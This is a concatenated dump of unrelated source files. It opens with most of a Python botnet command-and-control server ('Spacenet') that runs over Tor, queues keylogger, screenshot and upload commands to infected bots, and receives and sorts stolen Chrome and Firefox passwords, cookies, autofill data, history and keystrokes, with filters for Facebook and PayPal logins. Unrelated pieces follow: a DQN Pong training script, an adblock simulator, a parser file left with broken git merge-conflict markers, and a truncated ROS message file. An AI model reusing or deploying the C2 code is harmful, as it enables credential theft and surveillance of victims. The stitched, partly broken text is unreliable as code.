afc = afc.replace("'","'")
afc = afc.replace("u'","")
afc = afc.replace("\\n'","<br>")
afc = afc.replace(""",'"')
html = html.replace("{{AFC}}",HTMLParser.HTMLParser().unescape(afc))
except:
html = html.replace("{{KRC}}","Nothing Here.")
html = html.replace("{{HIC}}","Nothing Here.")
html = html.replace("{{AFC}}","Nothing Here.")
return html
@cherrypy.expose
@require_admin
def getcache(self, botid):
SaveLog("REQUEST : 200 [ Ok ] | Cache.html => %s" % botid)
with open("html/Cache.html", "r") as f:
html = f.read()
final_html = ''
filepath = "DumpDir/%s/getauth.txt" % botid
try:
with open(filepath,"r") as t:
everything = t.read()
if everything != "":
for item in everything.split("]]]==="):
if "===[[[" in item:
TABLE_PRESET = '''<table>
<tr>
<th>Request Type:</th>
<td>{{Request-Type}}</td>
</tr>
<tr>
<th>Host-Website:</th>
<td style="color:red">{{Host}}</td>
</tr>
<tr>
<th>User Agent:</th>
<td>{{User-Agent}}</td>
</tr>
<tr>
<th>Language:</th>
<td>{{Language}}</td>
</tr>
<tr>
<th>Hour:</th>
<td>{{Time}}</td>
</tr>
<tr>
<th>Cookie:</th>
<td>{{Cookie}}</td>
</tr>
<th>Payload-Credentials:</th>
<td style="color:red">{{Payload}}</td>
</tr>
</table><br>'''
TABLE_UNSORTED_PACKET = '''<table>
<tr>
<th> ( Unsorted Packet ) Packet Content:</th>
<td>{{pkt}}</td>
</tr>
</table><br>'''
buffer = item [ item.find("===[[[")+len("===[[[") : ]
COMPLETE_PACKET = ''
REQUEST_TYPE = ''
HOST = ''
USER_AGENT = ''
LANGUAGE = ''
HOUR = ''
COOKIE = ''
PAYLOAD = ''
COMPLETE_PACKET = find_between( buffer, "((", "))" )
REQUEST_TYPE = COMPLETE_PACKET.split(" ")[0]
HOST = find_between( COMPLETE_PACKET , "Host:", "\n" )
HOST = HOST.replace(" ","")
USER_AGENT = find_between( COMPLETE_PACKET , "User-Agent:", "\n" )
USER_AGENT = USER_AGENT.replace(" ","")
LANGUAGE = find_between( COMPLETE_PACKET , "Accept-Language:", "," )
LANGUAGE = LANGUAGE.replace(" ","")
HOUR = COMPLETE_PACKET.split("{{{")[1]
COOKIE = find_between( COMPLETE_PACKET , "Cookie:", "auth_key" )
COOKIE = COOKIE.replace(" ","")
PAYLOAD = find_between( COMPLETE_PACKET , "auth_key=" , "{{{")
TABLE_PRESET = TABLE_PRESET.replace("{{Request-Type}}",REQUEST_TYPE)
TABLE_PRESET = TABLE_PRESET.replace("{{Host}}",HOST)
TABLE_PRESET = TABLE_PRESET.replace("{{User-Agent}}",USER_AGENT)
TABLE_PRESET = TABLE_PRESET.replace("{{Language}}",LANGUAGE)
TABLE_PRESET = TABLE_PRESET.replace("{{Time}}",HOUR)
TABLE_PRESET = TABLE_PRESET.replace("{{Cookie}}",COOKIE)
TABLE_PRESET = TABLE_PRESET.replace("{{Payload}}",PAYLOAD)
final_html += TABLE_PRESET
if PAYLOAD == '':
try:
TABLE_PRESET = ''
TABLE_PRESET = TABLE_UNSORTED_PACKET.replace("{{pkt}}",COMPLETE_PACKET)
except:
pass
except:
final_html = 'File getauth.txt not found!'
html = html.replace("{{botid}}",botid)
kwords = ['password','username','pwd','usr','pass','user','email','referer']
try:
for word in kwords:
try:
TABLE_PRESET = TABLE_PRESET.replace(word,'<span style="color:black;background-color:#f4eb42;"><b>%s</b></span>'%word)
except:
pass
final_html = TABLE_PRESET
except:
pass
html = html.replace("{{Table_preset}}",final_html)
return html
class API(object):
@cherrypy.expose
@require_admin
def passupdate_setting(self, password=''):
SaveLog("REQUEST : 200 [ Ok ] | Admin password updated.")
set_admin_password(password)
@cherrypy.expose
@require_admin
def removebot(self, botid):
global BUFFER_BOT_REMOVED
cmd = "removeme"
if not validate_botid(botid):
raise cherrypy.HTTPError(403)
exec_DB("INSERT INTO commands VALUES (?, ?, ?, ?, ?)", (None, time.time(), cmd, False, html_escape(botid)))
SaveLog("Removing Bot.")
exec_DB("DELETE FROM bots WHERE name=?",(html_escape(botid),))
BUFFER_BOT_REMOVED.append(botid)
@cherrypy.expose
@require_admin
def klog(self, botid, cmd):
if not validate_botid(botid):
raise cherrypy.HTTPError(403)
exec_DB("INSERT INTO commands VALUES (?, ?, ?, ?, ?)", (None, time.time(), "keylogger %s" % cmd , False, html_escape(botid)))
@cherrypy.expose
def pop(self, botid, sysinfo, ip):
global BUFFER_BOT_REMOVED
if not validate_botid(botid):
raise cherrypy.HTTPError(403)
bot = query_DB("SELECT * FROM bots WHERE name=?", (botid,))
if not bot:
if botid in BUFFER_BOT_REMOVED :
SaveLog("Bot Removed Tried To Connect: botid => %s - sysinfo => %s - ip => %s" % (botid, sysinfo, ip))
BUFFER_BOT_REMOVED = []
else:
exec_DB("INSERT INTO bots VALUES (?, ?, ?, ?)", (html_escape(botid), time.time(), ip, html_escape(sysinfo)))
SaveLog("Storing New Bot : botid => %s - sysinfo => %s - ip => %s" % (botid, sysinfo, ip))
if not os.path.exists("DumpDir/%s" % botid):
os.makedirs("DumpDir/%s" % botid)
else:
exec_DB("UPDATE bots SET lastonline=? where name=?", (time.time(), botid))
cmd = query_DB("SELECT * FROM commands WHERE bot=? and sent=? ORDER BY date", (botid, 0))
if cmd:
exec_DB("UPDATE commands SET sent=? where id=?", (1, cmd[0][0]))
exec_DB("INSERT INTO output VALUES (?, ?, ?, ?)", (None, time.time(), "> " + cmd[0][2], html_escape(botid)))
return cmd[0][2]
else:
return ""
@cherrypy.expose
def worldupdate(self):
thread = Thread(target = worldgen)
thread.start()
thread.join()
@cherrypy.expose
def report(self, botid, output):
if not validate_botid(botid):
raise cherrypy.HTTPError(403)
if "{{info}}" in html_escape(output):
md_buffer = html_escape(output).split("{{info}}")[1]
out_file = open("DumpDir/%s/info.txt"% html_escape(botid),"w")
md_buffer = md_buffer.replace("{{info}}","")
out_file.write(md_buffer)
out_file.close()
elif "MD-STATUS" in html_escape(output):
md_buffer = html_escape(output).split(":")[1]
filename = "Logs/MassDownloadReport.txt"
out_file = open(filename,"a")
current_time = strftime("[%H-%M-%S_%d-%m-%Y]", gmtime())
texttowrite= str(current_time) + "\t[ " + str(html_escape(botid)) + " ] [ MD-STATUS:%s - OK ]\n" % str(md_buffer)
out_file.write(texttowrite)
out_file.close()
elif "{{KEYLOGS}}" in html_escape(output):
out_file = open("DumpDir//%s//Keystrokes.txt" % html_escape(botid) ,"w")
buffer_html = ''
buffer_html = html_escape(output).replace("{{KEYLOGS}}","")
out_file.write(buffer_html)
out_file.close()
SaveLog("Updating Keystrokes.")
elif "KRC{{{" in html_escape(output):
if not os.path.exists("DumpDir//%s" % html_escape(botid)):
os.makedirs("DumpDir//%s"% html_escape(botid))
out_file = open("DumpDir//%s//KRC.txt" % html_escape(botid) ,"w")
buffer_html = ''
buffer_html = html_escape(output).replace("KRC{{{","")
out_file.write(buffer_html.encode('utf-8'))
out_file.close()
SaveLog("Storing Chrome Data => Keywords Searched.")
elif "HIC{{{" in html_escape(output):
out_file = open("DumpDir//%s//HIC.txt" % html_escape(botid) ,"w")
buffer_html = ''
buffer_html = html_escape(output).replace("HIC{{{","")
out_file.write(buffer_html.encode('utf-8'))
out_file.close()
SaveLog("Storing Chrome Data => History.")
elif "AFC{{{" in html_escape(output):
out_file = open("DumpDir//%s//AFC.txt" % html_escape(botid) ,"w")
buffer_html = ''
buffer_html = html_escape(output).replace("AFC{{{","")
out_file.write(buffer_html.encode('utf-8'))
out_file.close()
SaveLog("Storing Chrome Data => Autofill Fields.")
elif "{{getrequestauth}}" in html_escape(output):
out_file = open("DumpDir//%s//getauth.txt" % html_escape(botid) ,"a")
buffer_html = ""
buffer_html = html_escape(output).replace("{{getrequestauth}}","")
out_file.write("===[[[((" + buffer_html + "))]]]===\n\n")
out_file.close()
SaveLog("Storing auth GET request.")
elif "CHROME PASSWORDS :" in html_escape(output):
buffer_html = ""
buffer_html = html_escape(output).replace("CHROME PASSWORDS :","")
buffer_html = buffer_html.replace("'" , "'")
out_file = open("DumpDir//%s.txt"% html_escape(botid),"w")
out_file.write("\nCHROME PASSWORDS : =================================================================================\n")
out_file.write(buffer_html)
out_file.close()
SaveLog("Storing Chrome Passwords.")
elif "FIREFOX PASSWORDS :" in html_escape(output):
buffer_html = ""
buffer_html = html_escape(output).replace("FIREFOX PASSWORDS :","")
buffer_html = buffer_html.replace("'" , "'")
out_file = open("DumpDir//%s-firefox.txt" % html_escape(botid),"w")
out_file.write("\nFIREFOX PASSWORDS : =================================================================================\n")
out_file.write(buffer_html)
out_file.close()
SaveLog("Storing Firefox Passwords.")
else:
exec_DB("INSERT INTO output VALUES (?, ?, ?, ?)", (None, time.time(), html_escape(output), html_escape(botid)))
@cherrypy.expose
@require_admin
def push(self, botid, cmd):
if not validate_botid(botid):
raise cherrypy.HTTPError(403)
exec_DB("INSERT INTO commands VALUES (?, ?, ?, ?, ?)", (None, time.time(), cmd, False, html_escape(botid)))
SaveLog("REQUEST : 200 [ Ok ] | push.html")
if "upload" in cmd:
uploads = cmd[cmd.find("upload"):]
up_cmds = [i for i in uploads.split("upload ") if i]
for upload in up_cmds:
end_pos = upload.find(";")
while end_pos > 0 and cmd[end_pos - 1] == '\\':
end_pos = cmd.find(";", end_pos + 1)
upload_filename = upload
if end_pos != -1:
upload_filename = upload_filename[:end_pos]
pending_uploads.append(os.path.basename(upload_filename))
if cmd.startswith("screenshot"):
pending_uploads.append("screenshot")
@cherrypy.expose
@require_admin
def sortKW(self, keyword):
SaveLog("Request Password DB => Sorting By KeyWord : %s " % keyword)
argc_buffer = ""
index_result = 0
list_of_files = glob.glob('DumpDir/*.txt')
if not list_of_files:
out_file = open("TempDir/tmp.txt","w")
out_file.write("")
out_file.close()
for fileName in list_of_files:
data = open(fileName).readlines()
for i in range(len(data)):
if keyword in data[i]:
if "," in data[i]:
argc_buffer = data[i]
else:
website = data[i].split("Website:")[1]
usr = data[i+2].split("Username:")[1]
pwd = data[i+4].split("Password:")[1]
argc_buffer += "--[ Result <b>%s</b> in <b>%s</b>\n\n" % (str(index_result),str(fileName))
argc_buffer += "<b>Website </b>: " + website.rstrip() + "\n"
argc_buffer += "<b>Username </b>: " + usr.rstrip() +"\n"
argc_buffer += "<b>Password </b>: " + pwd.rstrip() +"\n\n"
index_result += 1
out_file = open("TempDir/tmp.txt","w")
out_file.write(argc_buffer)
out_file.close()
data.close()
@cherrypy.expose
@require_admin
def sortIP(self, ip):
try:
write_buffer = ''
write_buffer0 = ''
file = open('DumpDir/%s.txt' %ip, 'r')
write_buffer += "--[ Results in <b>%s</b> \n\n" % ip
write_buffer_0 = file.read()
write_buffer_0 = write_buffer_0.replace("[*] All Firefox Passwords Dumped .","")
write_buffer_0 = write_buffer_0.replace("Website:","<b>Website</b>:")
write_buffer_0 = write_buffer_0.replace("Username:","<b>Username</b>:")
write_buffer_0 = write_buffer_0.replace("Password:","<b>Website</b>:")
write_buffer += write_buffer_0
out_file = open("TempDir/tmp.txt","w")
out_file.write(write_buffer)
out_file.close()
SaveLog("Request Password DB => Sorting By IP : %s " % ip)
except:
SaveLog("Error : Sorting by IP , No File Found.")
@cherrypy.expose
@require_admin
def sortSel(self, mode):
if mode == "face":
SaveLog("Request Password DB => Printing All Facebook Passwords")
argc_buffer = ""
index_result = 0
list_of_files = glob.glob('DumpDir/*.txt')
if not list_of_files:
out_file = open("TempDir/tmp.txt","w")
out_file.write("")
out_file.close()
for fileName in list_of_files:
data = open(fileName).readlines()
for i in range(len(data)):
if "facebook" in data[i] or "Facebook" in data[i]:
if "," in data[i]:
argc_buffer = data[i]
else:
website = data[i].split("Website:")[1]
usr = data[i+2].split("Username:")[1]
pwd = data[i+4].split("Password:")[1]
argc_buffer += "--[ Result <b>%s</b> in <b>%s</b>\n\n" % (str(index_result),str(fileName))
argc_buffer += "<b>Website </b>: " + website.rstrip() + "\n"
argc_buffer += "<b>Username </b>: " + usr.rstrip() +"\n"
argc_buffer += "<b>Password </b>: " + <PASSWORD>.rstrip() +"\<PASSWORD>"
index_result += 1
out_file = open("TempDir/tmp.txt","w")
out_file.write(argc_buffer)
out_file.close()
if mode == "pp":
SaveLog("Request Password DB => Printing All PayPal Passwords")
argc_buffer = ""
index_result = 0
list_of_files = glob.glob('DumpDir/*.txt')
if not list_of_files:
out_file = open("TempDir/tmp.txt","w")
out_file.write("")
out_file.close()
for fileName in list_of_files:
data = open(fileName).readlines()
for i in range(len(data)):
if "paypal" in data[i] or "Paypal" in data[i] or "PayPal" in data[i]:
if "," in data[i]:
argc_buffer = data[i]
else:
website = data[i].split("Website:")[1]
usr = data[i+2].split("Username:")[1]
pwd = data[i+4].split("Password:")[1]
argc_buffer += "--[ Result <b>%s</b> in <b>%s</b>\n\n" % (str(index_result),str(fileName))
argc_buffer += "<b>Website </b>: " + website.rstrip() + "\n"
argc_buffer += "<b>Username </b>: " + usr.rstrip() +"\n"
argc_buffer += "<b>Password </b>: " + pwd.rstrip() +"\n\n"
index_result += 1
out_file = open("TempDir/tmp.txt","w")
out_file.write(argc_buffer)
out_file.close()
if mode == "fir":
SaveLog("Request Password DB => Printing All Firefox Passwords")
list_of_files = glob.glob('DumpDir/*.txt')
if not list_of_files:
out_file = open("TempDir/tmp.txt","w")
out_file.write("")
out_file.close()
for fileName in list_of_files:
useful_content = []
with open(fileName, 'r') as input:
all_lines = input.readlines() # read all lines
for idx in range(len(all_lines)): # iterate all lines
if 'FIREFOX PASSWORDS : ' in all_lines[idx]:
useful_content.append(all_lines[idx])
idx = idx + 1
# found start of useful contents, continue iterate till it ends
while '[*] All Firefox' not in all_lines[idx]:
useful_content.append(all_lines[idx])
idx = idx + 1
break
out_file = open("TempDir/tmp.txt","w")
for line in useful_content:
out_file.write(str(line))
out_file.close()
if mode == "chr":
SaveLog("Request Password DB => Printing All Chrome Passwords")
list_of_files = glob.glob('DumpDir/*.txt')
if not list_of_files:
out_file = open("TempDir/tmp.txt","w")
out_file.write("")
out_file.close()
for fileName in list_of_files:
useful_content = []
with open(fileName, 'r') as input:
all_lines = input.readlines() # read all lines
for idx in range(len(all_lines)): # iterate all lines
if 'CHROME PASSWORDS : ' in all_lines[idx]:
useful_content.append(all_lines[idx])
idx = idx + 1
# found start of useful contents, continue iterate till it ends
while '[*] All Chrome' not in all_lines[idx]:
useful_content.append(all_lines[idx])
idx = idx + 1
break
out_file = open("TempDir/tmp.txt","w")
for line in useful_content:
out_file.write(str(line))
out_file.close()
if mode == "all":
SaveLog("Request Password DB => Printing All Passwords")
list_of_files = glob.glob('DumpDir/*.txt')
if not list_of_files:
out_file = open("TempDir/tmp.txt","w")
out_file.write("")
out_file.close()
for fileName in list_of_files:
in_file = open(fileName,"r")
text = in_file.read()
in_file.close()
out_file = open("TempDir/tmp.txt","w")
out_file.write(text)
out_file.close()
@cherrypy.expose
@require_admin
def stdout(self, botid):
if not validate_botid(botid):
raise cherrypy.HTTPError(403)
output = ""
bot_output = query_DB('SELECT * FROM output WHERE bot=? ORDER BY date DESC', (botid,))
for entry in reversed(bot_output):
if "infopc" in entry[2] or "removeme" in entry[2] or "keylogger" in entry[2]:
pass
else:
output += "%s\n\n" % entry[2]
bot_queue = query_DB('SELECT * FROM commands WHERE bot=? and sent=? ORDER BY date', (botid, 0))
for entry in bot_queue:
output += "> %s [PENDING...]\n\n" % entry[2]
SaveLog("Sending Command : %s" %entry[2])
return output
# Startup server
def main():
# ----- Handler Keyboard Interupt -----
signal.signal(signal.SIGINT, signal_handler)
# ------------------------
# ----- Tor service start -----
try:
os.system("sudo service tor start > /dev/null")
except:
pass
# ----- Server conf -----
app = Main()
app.api = API()
app.cnc = CNC()
cherrypy.config.update("conf/server.conf")
app = cherrypy.tree.mount(app, "", "conf/server.conf")
app.merge({"/": { "error_page.default": error_page}})
# ------------------------
# ----- Folder Creator -----
makedir.run("logs")
# --------------------------
# ----- Onion hostname reader -----
try:
in_file = open("/var/lib/tor/hidden_service/hostname","r")
text = in_file.read()
in_file.close()
SaveLog("Starting onion server on : http://%s:%s"%( text.rstrip() , cherrypy.config["server.socket_port"]))
except:
pass
# --------------------------
# ----- Server start -----
SaveLog("Starting clearnet server on : http://%s:%s"% (cherrypy.config["server.socket_host"], cherrypy.config["server.socket_port"]))
cherrypy.engine.start()
cherrypy.engine.block()
# --------------------------
# Welcome message
def welcome():
global SYS_VERSION
os.system("clear")
cprint('\n\n\t.oooooo..o . ', 'blue')
cprint('\td8P' 'Y8 .o8 ', 'cyan')
cprint('\tY88bo. oo.ooooo. .oooo. .ooooo. .ooooo. ooo. .oo. .ooooo. .o888oo ', 'blue')
cprint("\t '''Y8888o. 888' '88b 'P )88b d88' 'Y8 d88' '88b '888P'Y88b d88' '88b 888 ", 'cyan')
cprint('\t `"Y88b 888 888 .oP"888 888 888ooo888 888 888 888ooo888 888 ', 'blue')
cprint('\too .d8P 888 888 d8( 888 888 .o8 888 .o 888 888 888 .o 888 . ', 'cyan')
cprint("\t8''88888P' 888bod8P' 'Y888''8o 'Y8bod8P' 'Y8bod8P' o888o o888o 'Y8bod8P' '888' ", 'blue', end=' ')
cprint("V"+SYS_VERSION, 'blue')
cprint('\t 888 ', 'cyan')
cprint('\t o888o \n', 'blue')
cprint("__[ ! ] Software : Spacenet", 'white')
cprint("__[ ! ] Version : 0.0.1", 'white')
cprint("__[ ! ] Author : Spaceb4r", 'white')
cprint("__[ ! ] Help : See UsersGuide.pdf", 'yellow')
cprint("------------------------------------------------------------------------------------------------------\n", 'white' ,attrs=['bold'] )
# Main starting function
if __name__ == "__main__":
welcome()
main()
``` |
{
"source": "4nar/wimblepong_dqn",
"score": 2
} |
#### File: 4nar/wimblepong_dqn/train_new.py
```python
import collections
import matplotlib.pyplot as plt
from random import randint
import pickle
import gym
import numpy as np
import argparse
import wimblepong
from wimblepong.dqn_net import DQN
import torch
from torch.utils.tensorboard import SummaryWriter
from wimblepong.agent import ExperienceReplay, Agent
import torch.optim as optim
import torch.nn as nn
import cv2
def _rgb2gray(rgb):
res = cv2.resize(rgb[...,:3], dsize=(84, 84), interpolation=cv2.INTER_CUBIC)
res = np.matmul(res[...,:3], np.array([0.2989, 0.5870, 0.1140]))
res = np.reshape(res, (84, 84, 1))
return res
def preprocess(frame):
if frame.size == 200 * 200 * 3:
img = np.reshape(frame, [200, 200, 3]).astype(np.float32)
else:
assert False, "Unknown resolution."
img = img[:, :, 0] * 0.299 + img[:, :, 1] * 0.587 + img[:, :, 2] * 0.114
resized_screen = cv2.resize(img, (84, 110), interpolation=cv2.INTER_AREA)
x_t = resized_screen[18:102, :]
x_t = np.reshape(x_t, [84, 84, 1])
return x_t.astype(np.uint8)
parser = argparse.ArgumentParser()
parser.add_argument("--headless", action="store_true", help="Run in headless mode")
parser.add_argument("--housekeeping", action="store_true",
help="Plot, player and ball positions and velocities at the end of each episode")
parser.add_argument("--fps", type=int, help="FPS for rendering", default=30)
parser.add_argument("--scale", type=int, help="Scale of the rendered game", default=1)
args = parser.parse_args()
# Make the environment
# env = gym.make("WimblepongVisualMultiplayer-v0")
DEFAULT_ENV_NAME = "WimblepongVisualSimpleAI-v0"
env = gym.make(DEFAULT_ENV_NAME)
env.unwrapped.scale = args.scale
env.unwrapped.fps = args.fps
# Number of episodes/games to play
episodes = 1000
D = 200 * 200
# Define the player
player_id = 1
# Set up the player here. We used the SimpleAI that does not take actions for now
# policy = Policy(D, 3)
# player = Agent(policy)
# player = Agent(env, player_id)
# Housekeeping
states = []
win1 = 0
win_hist = []
device = torch.device("cpu")
net = DQN((4,84,84), env.action_space.n).to(device)
target_net = DQN((4,84,84), env.action_space.n).to(device)
writer = SummaryWriter(comment="-" + DEFAULT_ENV_NAME)
replay_size = 10000
# replay_size = 500
buffer_g = ExperienceReplay(replay_size)
agent = Agent(env, buffer_g)
eps_start=1.0
epsilon = eps_start
learning_rate = 1e-4
eps_decay=.999985
eps_min=0.02
optimizer = optim.Adam(net.parameters(), lr=learning_rate)
total_rewards = []
frame_idx = 0
best_mean_reward = None
MEAN_REWARD_BOUND = 19.0
replay_start_size = 10000
# replay_start_size = 500
batch_size = 32
gamma = 0.99
sync_target_frames = 1000
done = False
while True:
epsilon = max(epsilon * eps_decay, eps_min)
frame_idx += 1
reward, done = agent.play_step(net, epsilon, device=device)
print(reward, done)
if reward is not None:
total_rewards.append(reward)
mean_reward = np.mean(total_rewards[-100:])
print("%d: %d games, mean reward %.3f, (epsilon %.2f)" % (
frame_idx, len(total_rewards), mean_reward, epsilon))
writer.add_scalar("epsilon", epsilon, frame_idx)
writer.add_scalar("reward_100", mean_reward, frame_idx)
writer.add_scalar("reward", reward, frame_idx)
if best_mean_reward is None or best_mean_reward < mean_reward:
torch.save(net.state_dict(), DEFAULT_ENV_NAME + "-best.dat")
best_mean_reward = mean_reward
if best_mean_reward is not None:
print("Best mean reward updated %.3f" % (best_mean_reward))
if mean_reward > MEAN_REWARD_BOUND:
print("Solved in %d frames!" % frame_idx)
break
if len(buffer_g) < replay_start_size:
print('here')
continue
batch = buffer_g.sample(batch_size)
states, actions, rewards, dones, next_states = batch
states_v = torch.tensor(states).to(device)
next_states_v = torch.tensor(next_states).to(device)
actions_v = torch.tensor(actions).to(device)
rewards_v = torch.tensor(rewards).to(device)
done_mask = torch.ByteTensor(dones).to(device)
state_action_values = net(states_v).gather(1, actions_v.unsqueeze(-1)).squeeze(-1)
print('state_action_values.shape', state_action_values.shape)
next_state_values = target_net(next_states_v).max(1)[0]
next_state_values[done_mask] = 0.0
next_state_values = next_state_values.detach()
expected_state_action_values = next_state_values * gamma + rewards_v
loss_t = nn.MSELoss()(state_action_values, expected_state_action_values)
optimizer.zero_grad()
loss_t.backward()
optimizer.step()
if frame_idx % sync_target_frames == 0:
target_net.load_state_dict(net.state_dict())
writer.close()
``` |
{
"source": "4nd3r/adblock-simulator",
"score": 3
} |
#### File: 4nd3r/adblock-simulator/adblock_simulator.py
```python
import argparse
import json
import os
import re
import sys
import urllib.parse
import adblock
from publicsuffixlist import PublicSuffixList
class AdblockSimulator:
def add_filter_list(self, filter_list, fmt='standard'):
for item in filter_list:
if os.path.isfile(item):
if not self.add_filter_list_from_file(item, fmt):
return False
elif isinstance(item, str):
if not self.add_filter_list_from_string(item, fmt):
return False
else:
return False
return True
def add_hosts(self, hosts):
return self.add_filter_list(hosts, 'hosts')
def add_filter_list_from_file(self, filter_list_file, fmt='standard'):
try:
handle = open(filter_list_file, 'r')
filter_list_string = handle.read()
handle.close()
except Exception:
return False
return self.add_filter_list_from_string(filter_list_string, fmt)
_filter_set = None
_engine = None
def add_filter_list_from_string(self, filter_list_string, fmt='standard'):
try:
if self._filter_set is None:
self._filter_set = adblock.FilterSet()
self._filter_set.add_filter_list(filter_list_string, fmt)
self._engine = adblock.Engine(filter_set=self._filter_set)
except Exception:
return False
return True
def _prepend_url_scheme(self, url):
if not url.startswith('http://') \
and not url.startswith('https://'):
url = f'http://{url}'
return url
def _get_host(self, url):
url = self._prepend_url_scheme(url)
return urllib.parse.urlparse(url).netloc
_psl = None
def _get_domain(self, host):
if self._psl is None:
self._psl = PublicSuffixList(only_icann=True)
return self._psl.privatesuffix(host)
def _url_sort_key(self, url):
host = self._get_host(url)
if not host:
return url
domain = self._get_domain(host)
if not domain:
return host
return domain
def simulate(self, src_url, dst_urls_list):
if os.path.isfile(src_url):
try:
handle = open(src_url, 'r')
src_url = handle.read().strip()
handle.close()
except Exception:
return False
src_url = self._prepend_url_scheme(src_url)
dst_urls = []
for item in dst_urls_list:
if os.path.isfile(item):
try:
handle = open(item, 'r')
for line in handle:
dst_urls.append(line.strip())
handle.close()
except Exception:
return False
elif isinstance(item, str):
dst_urls.append(item)
results = {}
for dst_url in sorted(dst_urls, key=self._url_sort_key):
dst_url = self._prepend_url_scheme(dst_url)
blocker = self._engine.check_network_urls(
url=dst_url,
source_url=src_url,
request_type='')
results[dst_url] = not blocker.matched
return results
if __name__ == '__main__':
cli = argparse.ArgumentParser(add_help=False)
cli.add_argument('-f', metavar='FILTERS', action='append')
cli.add_argument('-h', metavar='HOSTS', action='append')
cli.add_argument('-s', required=True, metavar='SOURCE')
cli.add_argument('-d', required=True, metavar='DESTINATION', action='append')
cli.add_argument('-r', metavar='REGEX')
cli.add_argument('-j', action='store_true')
cli.add_argument('-a', action='store_true')
cli.add_argument('-b', action='store_true')
args = cli.parse_args()
if not args.f and not args.h:
cli.error('one of the following arguments is required: -f, -h')
AS = AdblockSimulator()
if args.f:
if not AS.add_filter_list(args.f):
print('adding filter list failed')
sys.exit(1)
if args.h:
if not AS.add_hosts(args.h):
print('adding hosts failed')
sys.exit(1)
results = AS.simulate(args.s, args.d)
if not results:
print('simulation failed')
sys.exit(1)
if args.r:
for result in results.copy():
if not re.search(args.r, result):
del results[result]
if args.j:
print(json.dumps(results, indent=4))
else:
for dst_url in results:
if results[dst_url]:
if args.a:
print(dst_url)
elif not args.b:
print(f'\x1b[32;1mALLOW\x1b[0m {dst_url}')
else:
if args.b:
print(dst_url)
elif not args.a:
print(f'\x1b[31;1mBLOCK\x1b[0m {dst_url}')
``` |
{
"source": "4ndersonLin/stockpile",
"score": 2
} |
#### File: app/parsers/scan.py
```python
<<<<<<< HEAD
from app.objects.c_relationship import Relationship
from plugins.stockpile.app.parsers.base_parser import BaseParser
=======
from app.objects.secondclass.c_fact import Fact
from app.objects.secondclass.c_relationship import Relationship
from app.utility.base_parser import BaseParser
>>>>>>> upstream/master
class Parser(BaseParser):
def parse(self, blob):
relationships = []
for match in self.line(blob):
values = match.split(':')
for mp in self.mappers:
relationships.append(
<<<<<<< HEAD
Relationship(source=(mp.source, values[0]),
edge=mp.edge,
target=(mp.target, values[1]))
=======
Relationship(source=Fact(mp.source, values[0]),
edge=mp.edge,
target=Fact(mp.target, values[1]))
>>>>>>> upstream/master
)
return relationships
``` |
{
"source": "4ndr/data-gather",
"score": 2
} |
#### File: data-gather/core/views.py
```python
import json
import requests
from django.shortcuts import render
# Create your views here.
def base(request):
smartcitizen = requests.get('https://api.smartcitizen.me/v0/devices/world_map')
smartcitizen_data = json.dumps(smartcitizen.json())
lass = requests.get('https://pm25.lass-net.org/data/last-all-lass.json')
lass_data = json.dumps(lass.json())
openaq = requests.get('https://api.openaq.org/v1/measurements')
openaq_data = json.dumps(openaq.json())
data = {'data1': smartcitizen_data, 'data2': lass_data, 'data3': openaq_data, }
return render(request, 'base.html', data)
```
#### File: data-gather/map/views.py
```python
from django.shortcuts import render
from django.http import JsonResponse
import requests
import json
# Create your views here.
def show_map(request):
template = 'map.html'
return render(request, template)
def send_map_data(request, data_base, date=None):
data_set = None
if date:
if data_base == '1':
smartcitizen = requests.get('https://api.smartcitizen.me/v0/devices/')
data_set = json.dumps(smartcitizen.json())
elif data_base == '2':
lass = requests.get('https://pm25.lass-net.org/data/last-all-lass.json')
data_set = json.dumps(lass.json())
elif data_base == '3':
openaq = requests.get('https://api.openaq.org/v1/measurements?limit=1000?date_from='+date)
data_set = json.dumps(openaq.json())
else:
if data_base == '1':
smartcitizen = requests.get('https://api.smartcitizen.me/v0/devices/')
data_set = json.dumps(smartcitizen.json())
elif data_base == '2':
lass = requests.get('https://pm25.lass-net.org/data/last-all-lass.json')
data_set = json.dumps(lass.json())
elif data_base == '3':
openaq = requests.get('https://api.openaq.org/v1/measurements?limit=1000?date_from=')
data_set = json.dumps(openaq.json())
data = {'data': data_set, }
return JsonResponse(data)
``` |
{
"source": "4ndre4s/Corium",
"score": 3
} |
#### File: Nominax/ByteCodeInterface/Generate.py
```python
import os
def read_txt(path: str) -> str:
if os.path.isfile(path):
with open(path, 'r') as file:
print("Reading: " + path)
return file.read()
else:
print("File not found: " + path)
exit(-1)
print("Nominax bytecode interface generator for Rust")
print("Copyright 2021 <NAME> \"pinsrq\" <<EMAIL>>")
def generate(template_file, output, useDots = False):
template = read_txt(template_file)
nox_dir = "../Include/Nominax/ByteCode/"
instruction_enum = read_txt(nox_dir + "ExportInstructionEnum.hpp")
category_enum = read_txt(nox_dir + "ExportInstructionCategoryEnum.hpp")
syscall_enum = read_txt(nox_dir + "ExportSysCallEnum.hpp")
mnemonic_table = read_txt(nox_dir + "ExportInstructionMnemonicTable.hpp")
category_table = read_txt(nox_dir + "ExportInstructionCategoryTable.hpp")
push_record_table = read_txt(nox_dir + "ExportInstructionPushRecordTable.hpp")
pop_record_table = read_txt(nox_dir + "ExportInstructionPopRecordTable.hpp")
immediate_table = read_txt(nox_dir + "ExportInstructiontImmediateTable.hpp")
descriptor_table = read_txt(nox_dir + "ExportInstructionDescriptorTable.hpp")
template = template.replace("$INSTRUCTION$", instruction_enum)
template = template.replace("$INSTRUCTION_CATEGORY$", category_enum)
template = template.replace("$MNEMONIC_TABLE$", mnemonic_table)
template = template.replace("$CATEGORY_TABLE$", category_table)
template = template.replace("$PUSH_RECORD_TABLE$", push_record_table)
template = template.replace("$POP_RECORD_TABLE$", pop_record_table)
template = template.replace("$IMMEDIATE_TABLE$", immediate_table)
template = template.replace("$DESCRIPTOR_TABLE$", descriptor_table)
template = template.replace("$SYSCALL$", syscall_enum)
# if language uses . instead of :: as scope operator:
if useDots:
template = template.replace("::", ".")
print("Writing generated code: " + output)
with open(output, "wt") as text_file:
text_file.write(template)
generate("Rust/Template.rs", "Rust/NominaxByteCodeInterface/src/lib.rs")
generate("C#/Template.cs", "C#/NominaxByteCodeInterface/Lib.cs", True)
``` |
{
"source": "4ndreas/ROSCoffeButler",
"score": 2
} |
#### File: arbotix_msgs/srv/_SetupChannel.py
```python
import sys
python3 = True if sys.hexversion > 0x03000000 else False
import genpy
import struct
class SetupChannelRequest(genpy.Message):
_md5sum = "c65e58d8b3b4d406126f6dc829a6011f"
_type = "arbotix_msgs/SetupChannelRequest"
